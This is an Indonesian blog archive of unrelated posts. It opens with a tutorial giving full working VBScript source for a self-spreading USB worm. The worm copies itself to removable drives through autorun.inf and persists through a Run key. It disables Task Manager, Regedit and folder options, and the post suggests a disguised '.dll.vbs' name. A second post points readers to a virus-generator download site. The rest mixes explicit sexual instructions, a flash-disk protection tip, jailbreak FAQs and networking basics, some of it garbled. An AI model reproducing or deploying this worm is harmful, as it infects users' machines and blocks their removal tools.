Selasa, 21 Februari 2012

Cara Membuat Virus dengan Notepad

Kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Sekarang buka Notepad-nya. Copy kode berikut :


'//--Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus--//
on error resume next

'//--Dim kata-kata berikut ini--//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

'//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- k4l0n6.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 39
'//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
'//--Cek Drive--//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

'//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\k4l0n6.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes = 39

'//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next

'//--Manipulasi Registry--//

set kalong = createobject("WScript.Shell")

'//--Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY--//
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE KALONG v.s. ZAY "

'//--Manip – Set agar file hidden tidak ditampilkan di Explorer--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

'//--Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

'//--Manip – Disable klik kanan--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

'//--Manip - Munculkan Pesan Setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe."

'//--Manip – Aktif setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0n6.dll.vbs "

'//--Manip – Ubah RegisteredOwner dan Organization--//
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Kalong"

'//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan--//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
Sumber Diambil dari : Fariskhi Vidyan
http://www.farislab.net.tf or http://farislab.webs.io

Cara Membuat Virus Mematikan Untuk Komputer

Cara Membuat Virus Mematikan Untuk Komputer. diinternet banyak sekali cara untuk dapat membuat virus yang mematikan namun banyak juga antivirus yang juga mematikan seperti Smadav dan artav, namun apakah pernah kita berfikir bagaimana bisa membuat sebuah virus komputer tersebut? banyak sekali program virus generator yang mampu membuat kita menjadi pandai bikin virus yang mematikan bagi komputer, yuuk ikuti sharing dari teman saya mengenai Cara Membuat Virus Mematikan Untuk Komputer.

langkah - langkah membuat virus komputer :
catatan : saya bukan ahli membuat virus, disini hanya sekedar sharing ilmu yang didapat diinternet, semua resiko ditanggung anda sendiri, dan saya tidak sama sekali mengetahui cara membuat virus ini.


Untuk membuat virus ada beberapa cara di antaranya yaitu:

* Menulis virus dengan bahasa pemrograman (jika cara ini anda harus bisa memahami bahasa pemrograman seprty, VB, pascal, Phyton de el el dech.

* Membuat Virus Cepat dengan Generator

Kali ini saya akan memberikan tips “Cara Bikin Virus Ganas Dengan Cepat”, adapun caranya yaitu:

* Anda harus melakukan download VIRUS GENERATOR yang programnya nanti akan saya kasih
* Install program tersebut
* Rancang dan Buatlah virus anda sendiri dengan mudah (pilihan yang terdapat di menu program pembuat virus sangatlah gampang dan saya anda dapat mempelajari nya sendiri.

Berikut adalah daftar alamat situs yang akan mengantar anda langsung untuk dapat mendownload program pembuat virus nya :

http://vx.netlux.org/vl.php

Kalau anda ingin mendownload program pembuat virusnya silahkan anda download sendiri dan tentukan sendiri jenisnya silahkan kunjungi situs ini www.vx.netlux.org/vl.php

nah dengan software virus generator tesebut semoga anda sudah bisa tahu cara membuat virus komputer ini.

Tips Hubungan Seks Di Malam Pertama


Tips ini sangat sesuai digunakan pada malam pertama. Pada malam pertama, lebih-lebih lagi untuk melakukan persetubuhan dengan pasangan isteri yang masih dara merupakan suatu cabaran yang terpaksa ditempuh dengan sabar oleh pasangan pengantin.
Persetubuhan yang dimaksudkan untuk memecah dara perlu dilakukan dengan lemah lembut dan bertimbangrasa. Ini akan menolong meminimakan rasa kesakitan isteri sewaktu dara terkoyak menerusi tusukan pertama.
Cara yang disarankan oleh orang Melayu ialah, suami duduk bersila setelah melakukan istimta’ yang secukupnya. Isteri didudukkan menghadap suami dalam keadaan mencangkung dan farajnya berada di atas zakar.
Di sepanjang posisi ini dilakukan suami tidak memainkan peranan yang aktif, tetapi hanya mencumbu dan membelai isteri bagi meningkatkan kenikmatannya.
Zakar dihalakan ke arah lubang faraj, kemudian isteri akan memasukkan zakar ke dalam liang farajnya dengan memandukannya dengan tangannya dan kemudian menekan farajnya ke arah kepala zakar dan memasukkan zakar sedikit demi sedikit. Isteri akan berada di dalam keadaan nikmat dan sakit yang meningkat dan menurun semasa proses memecah dara. Isteri akan membuat pilihan, dia akan menekankan farajnya agar zakar masuk lebih dalam apabila nikmat yang dirasainya lebih hebat dari kesakitan. Isteri akan berhenti sejauh mana dia merasa kesakitan lebih hebat dari kenikmatan. Bila kenikmatan meningkat kembali, dia akan menyambung kerjanya itu, agar zakar dapat masuk lebih dalam. Dengan cara ini akhirnya dara terkoyak, dan kemudian persetubuhan akan diteruskan dalam posisi yang lain atau dihentikan lalu dilakukan pada masa yang lain.
Kenikmatan pada isteri masa memecah dara itu dapat ditingkatkan dengan cumbuan dan rangsangan dari suami ke arah buah dada, pinggang, tengkuk, leher, mulut dan telinga isteri. Dalam artikata lain, suami perlulah melakukan cumbuan yang berterusan agar isteri itu lupakan dirinya dan kesakitan. Menghisap lidah isteri adalah amat baik dilakukan pada ketika itu.
Komen: Ia memang sangat sesuai digunakan ketika memasukkan zakar ke dalam faraj isteri buat kali pertama. InsyaAllah sangat nikmat, lagi-lagi jika suami isteri melakukan french kiss ketika proses tusukan zakar ke dalam faraj.

Tips Mudah Cara Melindungi Flashdisk Dari Virus Tanpa Software

Flashdisk, bentuknya yang mungil menjadi media penyimpanan data yang paling sering digunakan. Mudah dibawa kemana-mana, mudah disimpan dan tidak membutuhkan tempat khusus untuk membawanya. Bahkan hanya dengan seutas tali flashdisk, ia akan bertengger aman di leher kita layaknya kalung :-) kecuali Saykoji, penyanyi lagu online-online yang berkalung harddisk hehehe kapan-kapan bisa coba berkalung CPU ups! Just Kidding :-)
Namun, flashdisk yang memiliki karakter CS kuadrat alias colok sana colok sini :-) sangat rentan tertular virus dan menularkan virus. Piyuh! so, berhati-hatilah terhadap kekurangan dari media penyimpanan data ini, bisa-bisa CPU anda yang segedhe itu dibuat teler oleh flashdisk yang mungil dan imut kerena infeksi virus yang dibawanya  :-)
So, bagaimana cara mencegah flashdisk Anda agar tidak tertular virus dan menjadi sarang virus? Mari kita belajar komputer online tips mudah cara melindungi flashdisk dari virus. Inilah tips komputernya :
LANGKAH SINGKAT :
  1. Buat folder autorun.inf di flashdisk
  2. Buat file dengan karakter unik di folder autorun.inf
LANGKAH DETAIL :
  1. Buatlah sebuah folder dengan nama “autorun.inf” (tanpa kutip) dalam flashdisk.
  2. Masuklah folder autorun.inf tersebut kemudian buatlah file dari notepad dengan cara klik kanan di tempat kosong pilih New pilih Text Document dan berilah nama sesuka Anda, misal coba.txt
  3. Bukalah program CHARACTER MAP dengan cara masuk START kemudian ALL PROGRAMS, ACCESORIES, SYSTEM TOOLS, dan CHARACTER MAP.
  4. Tips Mudah Cara Melindungi Flashdisk Dari Virus
  5. Setelah CHARACTER MAP terbuka, pilih font yang berakhiran Unicode, misal Arial Unicode. Scroll kebawah sampai terlihat huruf-huruf unik seperti tulisan China.
  6. Tips Mudah Cara Melindungi Flashdisk Dari Virus
  7. Pilih 5 atau lebih karakter atau huruf China yang Anda inginkan, klik dua kali tiap kali Anda memilihnya. Setelah selesai klik tombol Copy.
  8. Rubahlah nama file coba.txt dengan karakter unik pada step 5 tadi dengan cara kembalilah ke flashdisk Anda, masuklah ke folder autorun.inf, klik kanan pada file coba.txt, pilih rename, kemudian tekan secara bersama-sama Ctrl+V. (Jika keluar karakter kotak-kotak abaikan saja)
  9. Selamat, anda telah mempelajari tips mudah cara melindungi flashdisk dari virus.
Penjelasan singkat : folder Autorun.inf yang Anda buat tadi akan memblokir virus membuat file autorun.inf yang mengangkut virus. Virus yang cerdas akan berusaha menghapus folder autorun.inf, tetapi karena di dalamnya ada file dengan karakter atau tulisan unik tadi, virus tidak akan bisa menghapusnya :-)
Demikianlah Tips Trik Komputer tentang Cara Melindungi Flashdisk Dari Virus Tanpa Software semoga membantu Anda. Terimakasih atas kunjungan Anda, semoga menjadikan belajar komputer online kita bermanfaat

Pengertian Jailbreak

PENGERTIAN JAILBREAK :)

Q : Apa itu Jailbreak ?
A : Jailbreak secara umum berarti membuat iPod-iPhone-iPad untuk bebas di modifikasi, dan menghilangkan berbagai macam keterbatasan-keterbatasan yang ada pada iPod-iPhone-iPad.

Q : Kenapa harus di Jailbreak ?
A : Dengan men-Jailbreak iPhone, anda akan mampu menambahkan berbagai macam aplikasi dan juga mengubah tampilan iPod-iPhone-iPad anda lebih menarik. Dan harus anda ingat bahwa kini tersedia berbagai macam aplikasi yang menarik, unik dan tentunya layak untuk ditambahkan ke iPod-iPhone-iPad, dan itu semua hanya bisa diinstal bila anda men-Jailbreak iPod-iPhone-iPad anda.

Q : Apa akibat terburuk Jailbreak?
A : Yang pasti dengan proses Jailbreak akan menghilangkan garansi iPod-iPhone-iPad anda, namun cukup dengan me-Restore ulang bukti iPod-iPhone-iPad pernah di Jailbreak akan hilang & tidak meninggalkan jejak.

Q : Apa perbedaan antara Tethered Jailbreak & Unthetered Jailbreak ? 
A : Tethered Jailbreak adalah Jailbreak yang tidak sempurna / versi coba-coba, dimana ketika iPod-iPhone-iPad dalam keadaan mati & dinyalakan kembali / di restart maka akan stuck di logo apple tidak bisa masuk menu, maka perlu kembali di Jailbreak untuk memancing agar bisa digunakan kembali secara normal.

Unthetered Jailbreak adalah Jailbreak versi sempurna! ketika iPod-iPhone-iPad dalam keadaan mati & dinyalakan kembali / di restart semua berjalan normal tidak stuck di logo apple pada saat dinyalakan kembali.

Pengertian jaringan wireless dan komponen pendukungnya

Jaringan Wireless
Wireless atau wireless network merupakan sekumpulan komputer yang saling terhubung antara satu dengan lainnya sehingga terbentuk sebuah jaringan komputer dengan menggunakan media udara/gelombang sebagai jalur lintas datanya. Pada dasarnya wireless dengan LAN merupakan sama-sama jaringan komputer yang saling terhubung antara satu dengan lainnya, yang membedakan antara keduanya adalah media jalur lintas data yang digunakan, jika LAN masih menggunakan kabel sebagai media lintas data, sedangkan wireless menggunakan media gelombang radio/udara. Penerapan dari aplikasi wireless network ini antara lain adalah jaringan nirkabel diperusahaan, atau mobile communication seperti handphone, dan HT.
Adapun pengertian lainnya adalah sekumpulan standar yang digunakan untuk Jaringan Lokal Nirkabel (Wireless Local Area Networks – WLAN) yang didasari pada spesifikasi IEEE 802.11. Terdapat tiga varian terhadap standard tersebut yaitu 802.11b atau dikenal dengan WIFI (Wireless Fidelity),802.11a (WIFI5), dan 802.11. ketiga standard tersebut biasa di singkat 802.11a/b/g. Versi wireless LAN 802.11b memilik kemampuan transfer data kecepatan tinggi hingga 11Mbps pada band frekuensi 2,4 Ghz. Versi berikutnya 802.11a, untuk transfer data kecepatan tinggi hingga 54 Mbps pada frekuensi 5 Ghz. Sedangkan 802.11g berkecepatan 54 Mbps dengan frekuensi 2,4 Ghz.


Wireless LAN
Wireless Local Area Network pada dasarnya sama dengan jaringan Local Area Network yang biasa kita jumpai. Hanya saja, untuk menghubungkan antara node device antar client menggunakan media wireless, chanel frekuensi serta SSID yang unik untuk menunjukkan identitas dari wireless device.



Komponen pada WLAN
Untuk bisa mengembangkan sebuah mode WLAN, setidaknya diperlukan empat komponen utama yang harus disediakan, yaitu :
1. Access Point
Access Point akan menjadi sentral komunikasi antara PC ke ISP, atau dari kantor cabang ke kantor pusat jika jaringan yang dikempangkan milik sebuah korporasi pribadi. Access Point ini berfungsi sebagai konverter sinyal radio yang dikirimkan menjadi sinyal digital yang akan disalurkan melalui perangkat WLAN lainnya untuk kemudian akan dikonversikan kembali menjadi sinyal radio oleh receiver.
2. Wireless LAN Interface
Alat ini biasanya merupakan alat tambahan yang dipasangkan pada PC atau Laptop. Namun pada beberapa produk laptop tertentu, interface ini biasanya sudah dipasangkan pada saat pembeliannya. Namun interface ini pula bisa diperjual belikan secara bebas dipasaran dengan harga yang beragam. Disebut juga sebagai Wireless LAN Adaptor USB.
3. Mobile/Desktop PC
Perangkat akses untuk pengguna (user) yang harus sudah terpasang media Wireless LAN interface baik dalam bentuk PCI maupun USB.
4. Antena External, digunakan untuk memperkuat daya pancar. Antena ini bisa dirakit sendiri oleh client (user), misal : antena kaleng.


Hal-hal Yang Harus Diperhatikan Pada WLAN
Ada beberapa hal yang harus diperhatikan saat membangun WLAN, seperti :
1. Seberapa besar jaringan WLAN akan dibangun. Dalam hal ini, adalah melihat kebutuhan akan jaringan yang akan dibangun nantinya. Jangan sampai pembangunan WLAN memakan biaya yang besar, sementara penggunaannya hanya terbatas untuk beberapa client saja. Meski bisa dijadikan sebagai investasi jangka panjang, akan tetapi akan jauh lebih bijak jika hanya untuk menghubungkan beberapa PC/Laptop menggunakan media komunikasi Add Hock (peer to peer)
2. Sistem keamanan. Sistem keamanan ini penting dalam sebuah jaringan WLAN. Sebab WLAN merupakan sebuah jaringan yang rentan terhadap serangan dari luar karena komunikasinya menggunakan sinyal radio/gelombang yang bisa ditangkap oleh client ‘x’ pada area-area tertentu. Sistem keamanan ini penting karena jalur komunikasi data bisa saja berisi data-data rahasia dan penting, sehingga orang tidak bisa masuk kecuali melalui ijin akses yang telah distandarkan.
3. Koneksi yang akan dikembangkan. Meskipun secara umum, akses point mampu menampung hingga ratusan klien dibawahnya, akan tetapi secara prosedur, para vendor penyedia piranti akses point merekomendasikan belasan hingga 40-an client yang boleh terhubung dalam sebuah layanan WLAN. Hal ini berpengaruh pada tingkat kecepatan dan pembagian hak akses pada jaringan yang tersedia.

pengenalan jaringan LAN

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                            
--====----====----====----====----====----====----====----====----====----===--

  Pengertian dan Prinsip Kerja LAN
  ================================

  LAN dapat definisikan sebagai network  atau   jaringan   sejumlah  sistem 
  komputer yang lokasinya terbatas didalam satu gedung, satu kompleksgedung
  atau suatu kampus dan tidak  menggunakan media fasilitas komunikasi  umum 
  seperti telepon, melainkan pemilik dan  pengelola   media   komunikasinya 
  adalah pemilik LAN itu sendiri.
  Dari definisi diatas dapat kita ketahui bahwa sebuah LAN  dibatasi   oleh 
  lokasi secara fisik. Adapun penggunaan LAN itu sendiri mengakibatkansemua 
  komputer yang terhubung dalam jaringan dapat bertukar  data  atau  dengan
  kata  lain  berhubungan. Kerjasama  ini  semakin  berkembang   dari hanya 
  pertukaran data hingga penggunaan peralatan secara bersama.
  LAN yang umumnya menggunakan hub, akan mengikuti  prinsip   kerja hub itu 
  sendiri. Dalam hal ini adalah bahwa hub tidak memiliki pengetahuantentang
  alamat tujuan sehingga penyampaian data secara broadcast, dan juga karena 
  hub hanya memiliki satu domain collision sehingga  bila   salah satu port
  sibuk maka port-port yang lain harus menunggu.


 
  Komponen-komponen Dasar LAN
  ===========================

  Beberapa komponen dasar yang biasanya membentuk suatu LAN adalah  sebagai 
  berikut:

  •Workstation
  ------------
  Workstation merupakan node atau host yang berupa suatu   sistem komputer. 
  Sistem komputer ini dapat berupa PC atau dapat pula berupa suatu komputer 
  yang  besar  seperti  sistem  minicomputer, bahkan  suatu      mainframe.
  Workstation dapat bekerja sendiri (stand-alone)  dapat pula   menggunakan
  jaringan untuk bertukar data dengan workstation atau user yang lain.

  •Server
  -------
  Perangkat keras (hardware) yang  berfungsi untuk   melayani  jaringan dan 
  workstation  yang  terhubung  pada  jaringan tersebut.pada umumnya sumber 
  daya (resources)   seperti  printer, disk, dan  sebagainya  yang   hendak 
  digunakan secara bersama oleh para  pemakai  di  workstation  berada  dan
  bekerja pada server. Berdasarkan jenis pelayanannya  dikenal  disk server,
  file server, print server, dan suatu server juga dapat mempunyai beberapa 
  fungsi pelayanan sekaligus.

  •Link (hubungan)
  ----------------
  Workstation dan server tidak dapat berfungsi  apabila  peralatan  tersebut
  secara fisik tidak terhubung. Hubungan tersebut dalam LAN dikenal  sebagai
  media transmisi yang umumnya  berupa kabel. Adapun   beberapa  contoh dari 
  link adalah:
  1.Kabel Twisted Pair 
  •Kabel ini terbagi dua, yaitu Shielded Twisted Pair dan Unshielded Twisted 
   Pair(UTP)
  •Lebih banyak dikenal karena merupakan kabel telpon
  •Relatif murah
  •Jarak yang pendek
  •Mudah terpengaruh oleh gangguan
  •Kecepatan data yang dapat didukung terbatas, 10-16 Mbps

  2.Kabel Coaxial
  •Umumnya digunakan pada televisi
  •Jarak yang relatif lebih jauh
  •Kecepatan pengiriman data lebih tinggi di banding Twisted Pair, 30 Mbps
  •Harga yang relatif tidak mahal
  •Ukurannya lebih besar dari Twisted Pair

  3.Kabel Fiber Optic
  •Jarak yang jauh
  •Kecepatan data yang tinggi, 100 Mbps
  •Ukuran yang relatif kecil
  •Sulit dipengaruhi gangguan
  •Harga yang relatif masih mahal
  •Instalasi yang relatif sulit


  •Network Interface Card (NIC)
  -----------------------------
  Suatu workstation tidak dihubungkan secara langsung dengan kabel jaringan 
  ataupun tranceiver cable, tetapi melalui suatu rangkaian elektronika yang
  dirancang khusus untuk menangani  network  protocol  yang dikenal  dengan 
  Network Interface Card (NIC).

  •Network Software
  -----------------
  Tanpa adanya software jaringan maka jaringan tersebut tidak  akan bekerja 
  sebagaimana yang dikehendaki. Software ini juga yang  memungkinkan sistem 
  komputer yang satu berkomunikasi dengan sistem komputer yang lain. 

  Peralatan Pendukung LAN
  ======================= 

  a.Repeater
  ------------
  •Pada OSI, bekerja pada lapisan Physical
  •Meneruskan dan memperkuat sinyal
  •Banyak digunakan pada topologi Bus
  •Penggunaannya mudah dan Harga yang relatif murah
  •Tidak memiliki pengetahuan tentang alamat tujuan  sehingga   penyampaian 
   data secara  broadcast
  •Hanya memiliki satu domain collision sehingga bila salah satu port sibuk 
   maka   port-port yang lain harus menunggu.

  b.Hub
  -----
  •Bekerja pada lapisan Physical 
  •Meneruskan sinyal
  •Tidak memiliki pengetahuan tentang alamat tujuan
  •Penggunaannya relatif mudah dan harga yang terjangkau
  •Hanya memiliki satu buah domain collision

  c.Bridge
  --------
  •Bekerja di lapisan Data Link
  •Telah menggunakan alamat-alamat untuk meneruskan data ke tujuannya
  •Secara otomatis membuat tabel penterjemah untuk diterima  masing2  port

  d.Switch
  --------
  •Bekerja di lapisan Data Link
  •Setiap port didalam swith memiliki domain collision sendiri-sendiri
  •Memiliki tabel penterjemah pusat yang memiliki  daftar penterjemah untuk 
   semua port
  •Memungkinkan transmisi secara full duflex (dua arah)

  e.Router
  --------
  •Router berfungsi menyaring atau memfilter lalu lintas data 
  •Menentukan dan memilih  jalur alternatif yang akan   dilalui  oleh data 
  •Menghubungkan antar jaringan LAN, bahkan dengan WAN

  Topologi LAN
  =============

  Pengertian topologi Jaringan adalah  susunan lintasan aliran data didalam 
  jaringan yang secara fisik menghubungkan simpul yang satu  dengan  simpul 
  lainnya.   Berikut  ini  adalah beberapa topologi  jaringan  yang ada dan 
  dipakai hingga saat ini, yaitu:
  •Topologi Star
  Beberapa simpul/node dihubungkan dengan simpul pusat/host, yang membentuk 
  jaringan fisik seperti bintang, semua komunikasi ditangani  langsung  dan 
  dikelola oleh host yang berupa mainframe komputer.


                    [PC1]
                      |                    
      [PC2]-------[Server]---------[PC3]
                   /    \
                  /      \
               [PC4]    [PC5]             




  •Topologi Hierarkis 
  Berbentuk seperti pohon bercabang yang terdiri dari  komputer induk(host) 
  dihubungkan dengan simpul/node lain secara berjenjang. Jenjang yang lebih
  tinggi berfungsi sebagai pengatur kerja jenjang dibawahnya.
 
                     [Server]
                     /      \
           [server/PC]       [server/PC]
               /  \             /  \
              /    \           /    \
    [PC1]  [PC2]     [PC3]  [PC4]  



  •Topologi Bus
  Beberapa simpul/node dihubungkan dengan jalur  data  (bus). Masing2  node 
  dapat melakukan tugas-tugas dan operasi yangberbeda namun semua mempunyai 
  hierarki yang sama.


                      
                       [PC1]  [PC2]     [PC3]  [PC4]
                         | |   |  |
           =backbone================================
      | |    |      |
   [PC1]  [PC2]     [PC3]  [PC4]


  •Topologi Loop
  Merupakan hubungan  antar simpul/node  secara serial  dalam bentuk suatu 
  lingkaran tertutup.  Dalam bentuk ini  tak ada  central node/host, semua 
  mempunyai hierarki yang sama.
         

          [PC1] 
      [PC2] | [PC3]
                   \|/         
           (_) <== lingkaran
    / \ 
         [PC4][PC5]



  •Topologi Ring
  Bentuk ini merupakan gabungan bentuk topologi loop dan bus,  jika salah 
  satu  simpul/node  rusak, maka tidak akan mempengaruhi  komunikasi node 
  yang lain karena terpisah dari jalur data.



          [PC1a] 
    [PC1b]__|__[PC1c]  << bus 
                                 |
                            [PC2]|[PC3]                  <<ring
                  \ | /         
           (_) <== lingkaran
    / \ 
         [PC4][PC5]



  •Topologi Web
  Merupakan bentuk topologi yang masing-masing simpul/node  dalam jaringan 
  dapat saling berhubungan  dengan node   lainnya melalui  beberapa   link. 
  Suatu bentuk web network  dengan  n node, akan menggunakan link sebanyak 
  n(n-1)/2.

  
    [PC1]
          / / \ \  
                         [PC2]=-+---+=[PC3]
                           |   /     \  | 
    [PC4]=-------=[PC5]



  
  Dengan menggunakan segala kelebihan dan kekurangan  masing2 konfigurasi,
  memungkinkan dikembangkannya suatu konfigurasi baru yang  menggabungkan 
  beberapa topologi disertai teknologi  baru agar  kondisi   ideal  suatu 
  sistem jaringan dapat terpenuhi.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-EOF]
by :http://ezine.echo.or.id/ezine1/pengenalan%20jaringan%20%5Bbagian%201%5D.txt

Pengertian Jaringan computer Lan

LAN dapat definisikan sebagai network atau jaringan sejumlah system komputer yang lokasinya terbatas didalam satu gedung, satu kompleks gedung atau suatu kampus dan tidak menggunakan media fasilitas komunikasi umum seperti telepon, melainkan pemilik dan pengelola media komunikasinya adalah pemilik LAN itu sendiri. Dari definisi diatas dapat kita ketahui bahwa sebuah LAN dibatasi oleh lokasi secara fisik. Adapun penggunaan LAN itu sendiri mengakibatkan semua komputer yang terswitching dalam jaringan dapat bertukar data atau dengan kata lain berswitchingan. Kerjasama ini semakin berkembang dari hanya pertukaran data hingga penggunaan peralatan secara bersama. LAN yang umumnya menggunakan switch, akan mengikuti prinsip kerja switch itu sendiri. Dalam hal ini adalah bahwa switch tidak memiliki pengetahuan tentang alamat tujuan sehingga penyampaian data secara broadcast, dan juga karena switch hanya memiliki satu domain collision sehingga bila salah satu port sibuk maka port-port yang lain harus menunggu, akan tatapi switch sekarang sudah jarang digunakan, karena banyak kekurangannya, sekarang switch diganti dengan switch yang lebih bagus di bandingkan dengan dengan switch, dari perinsip kerjanyapun tidak banyak malakukan broadcast.

Pengertian Peer To Peer



Peer to Peer adalah adalah suatu teknologi sharing (pemakaian bersama) resource dan service antara satu komputer dan komputer yang lain. pengertian yang lebih tepat mengenai peer to peer (p2p) adalah sistem terkomputerisasi Client-Server dimana suatu komputer berfungsi sebagai client sekaligus sebagai server, sehingga memungkinkan komunikasi dan pertukaran resource antara dua komputer secara langsung (real time).

Pengertian Jaringan Internet

Jaringan Internet - Pengertian Jaringan Internet. Teknologi berkembang pesat sehingga ada sebuah slogan yang mengatakan "Dunia di Gemgaman Tangan Anda", salah satu teknologi yang sungguh fenomenal adalah Internet, sebuah Jaringan yang begitu kompleks namun sungguh mengagumkan maka kita sebut sebagai Jaringan Internet. Internet adalah jaringan komputer yang bisa dikategorikan sebagai WAN, menghubungkan berjuta komputer diseluruh dunia, tanpa batas negara, dimana setiap orang yang memiliki komputer dapat bergabung ke dalam jaringan ini hanya dengan melakukan koneksi ke penyedia layanan internet (internet service provider / ISP) seperti Telkom Speedy, atau IndosatNet. Internet dapat diterjemahkan sebagai international networking (jaringan internasional), karena menghubungkan komputer secara internasional, atau sebagai internetworking (jaringan antar jaringan) karena menghubungkan berjuta jaringan diseluruh dunia.

Internet dimulai ketika Departemen Pertahanan Amerika Serikat (Department of Defense USA) membangun sebuah jaringan komputer di tahun 1969, yang diberi nama ARPANET (Advanced Research Project Agency NETwork) dengan tujuan untuk menghubungkan beberapa komputer yang berada dibeberapa universitas melakukan riset militer, terutama untuk membangun jaringan komunikasi komputer yang mampu bertahan terhadap serangan nuklir. Jaringan ini berkembang terus, semakin banyak komputer yang terlibat, dan riset disisi pengembangan perangkat lunak juga berkembang. Pada bulan Mei tahun 1974, Vinton G.Cerf dari Stanford University dan Robert E.Kahn dari Departemen Pertahanan USA, mempublikasi sebuah paper di IEEE Transaction on Communication berjudul “A Protocol for Packet Network Intercommunication”, konsep ini kemudian populer sebagai protokol TCP/IP, ketika ARPANET meng-adopsi protokol menjadi protokol standard untuk ARPANET pada tahun 1983. Pihak universitas terutama University of California at Berkeley kemudian membangun sistem operasi Berkeley Software Distribution Unix) atau BSD UNIX (dikenal dengan nama Free BSD Unix) dan pihak departemen pertahanan membiayai Bolt Baranek dan Newman (BBN) untuk meng-implementasi protokol TCP/IP pada BSD Unix untuk diterapkan pada ARPANET, dengan demikian cikal-bakal internet terbentuk.

Pada penghujung tahun 1983, jaringan ARPANET dibagi dua menjadi DARPANET (Defence ARPANET) dan MILNET (MILitary NETwork). Pada tahun 1985 dibentuklah jaringan NFSNET (National Science Foundation NETwork) untuk menghubungkan supercomputer yang ada diberbagai universitas di Amerika dan disambungkan dengan ARPANET. Jaringan NSFNET dikembangkan terus oleh periset perguruan tinggi. Pada tahun 1988 jaringan backbone internet ini hanya berkapasitas 56 Kbps. Walaupun pada tahun 1990 secara resmi ARPANET ditutup, namun jaringan internet yang telah terbentuk diteruskan oleh pihak universitas di Amerika dan memasukkan jaringan universitas di benua Amerika (Kanada dan Amerika Selatan) serta jaringan di Eropa menjadi bagian dari internet. Pada tahun 1992 jaringan backbone ditingkatkan ke T3 dengan kecepatan 45 Mbps, dan disekitar tahun 1995 ditingkatkan lagi menjadi OC-3 pada kecepatan 155 Mbps. Kini backbone internet berkecepatan tinggi dalam order Gbps.

